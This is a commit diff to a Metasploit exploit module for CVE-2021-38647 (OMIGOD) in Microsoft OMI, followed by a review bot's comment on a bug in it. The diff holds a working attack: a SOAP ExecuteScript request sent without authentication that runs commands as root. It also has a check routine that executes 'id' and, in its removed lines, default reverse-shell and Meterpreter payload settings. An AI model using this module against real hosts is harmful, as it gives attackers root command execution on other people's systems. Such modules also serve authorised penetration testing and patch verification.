Update references and add a check method
parent
e9582d1ddb
commit
33bacd2b20
|
@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::JavaDeserialization
|
||||
|
||||
XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze
|
||||
|
||||
|
@ -20,12 +19,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
info,
|
||||
'Name' => 'on',
|
||||
'Description' => %q{
|
||||
By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
|
||||
that will cause it to execute an operating system command as the root user.
|
||||
},
|
||||
'Author' => [
|
||||
'Spencer McIntyre',
|
||||
'wvu'
|
||||
'Nir Ohfeld', # vulnerability discovery & research
|
||||
'Shir Tamari', # vulnerability discovery & research
|
||||
'Spencer McIntyre', # metasploit module
|
||||
'wvu' # metasploit module
|
||||
],
|
||||
'References' => [
|
||||
%w[CVE 2021-38647],
|
||||
%w[URL https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647],
|
||||
%w[URL https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure],
|
||||
%w[URL https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/],
|
||||
%w[URL https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647]
|
||||
],
|
||||
'DisclosureDate' => '2021-09-14',
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -38,10 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Type' => :unix_cmd,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
|
||||
}
|
||||
'Type' => :unix_cmd
|
||||
}
|
||||
],
|
||||
[
|
||||
|
@ -49,17 +54,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Type' => :linux_dropper,
|
||||
'DefaultOptions' => {
|
||||
'CMDSTAGER::FLAVOR' => :curl,
|
||||
'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
|
||||
}
|
||||
'Type' => :linux_dropper
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1,
|
||||
'DefaultOptions' => {
|
||||
'SSL' => true
|
||||
'RPORT' => 5985,
|
||||
'SSL' => false,
|
||||
'MeterpreterTryToFork' => true
|
||||
},
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -70,14 +73,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(5985),
|
||||
OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
# TODO: write this
|
||||
CheckCode::Vulnerable('hax hax hax')
|
||||
http_res = send_command('id')
|
||||
return CheckCode::Unknown if http_res.nil?
|
||||
return CheckCode::Safe unless http_res.code == 200
|
||||
|
||||
cmd_res = parse_response(http_res)
|
||||
return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /
|
||||
|
||||
return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -97,8 +105,32 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def execute_command(cmd, _opts = {})
|
||||
vprint_status("Executing command: #{cmd}")
|
||||
res = send_command(cmd)
|
||||
|
||||
res = send_request_cgi(
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
|
||||
end
|
||||
|
||||
parse_response(res)
|
||||
end
|
||||
|
||||
def parse_response(res)
|
||||
return nil unless res&.code == 200
|
||||
|
||||
return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
|
||||
unless return_code == 0
|
||||
print_error("Failed to execute command: #{cmd} (status: #{return_code})")
|
||||
end
|
||||
|
||||
{
|
||||
return_code: return_code,
|
||||
stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
|
||||
stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
|
||||
}
|
||||
end
|
||||
|
||||
def send_command(cmd)
|
||||
send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'ctype' => 'text/xml;charset=UTF-8',
|
||||
|
@ -112,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
</a:ReplyTo>
|
||||
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
|
||||
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
|
||||
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
|
||||
<a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>
|
||||
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
|
||||
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
|
||||
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
|
||||
|
@ -132,20 +164,5 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
</s:Envelope>
|
||||
ENVELOPE
|
||||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
|
||||
end
|
||||
|
||||
return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
|
||||
unless return_code == 0
|
||||
print_error("Failed to execute command: #{cmd} (status: #{return_code})")
|
||||
end
|
||||
|
||||
{
|
||||
return_code: return_code,
|
||||
stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
|
||||
stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
|
||||
}
|
||||
end
|
||||
end
|
||||
|
|
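Review bot: In the hunk at -97,8 +105,32, `parse_response(res)` reads `cmd` inside `print_error("Failed to execute command: #{cmd} (status: #{return_code})")` on the non-zero ReturnCode path, but the method's only parameter is `res` and no local of that name is defined there, so that branch raises `NameError` unless a `cmd` method is defined elsewhere in the class. The simplest fix is to drop the command from the message, `print_error("Command returned non-zero status: #{return_code}")`, or add a second parameter and pass the command through from `execute_command` and `check`. The same method calls `res.get_xml_document` three times, re-parsing the body for each XPath lookup; hoisting it into `doc = res.get_xml_document` before the lookups avoids the repeated parse. Note also that `&.content.to_i` maps a missing ReturnCode element to 0, which the method then treats as success; `parse_response` lies fully within the hunk.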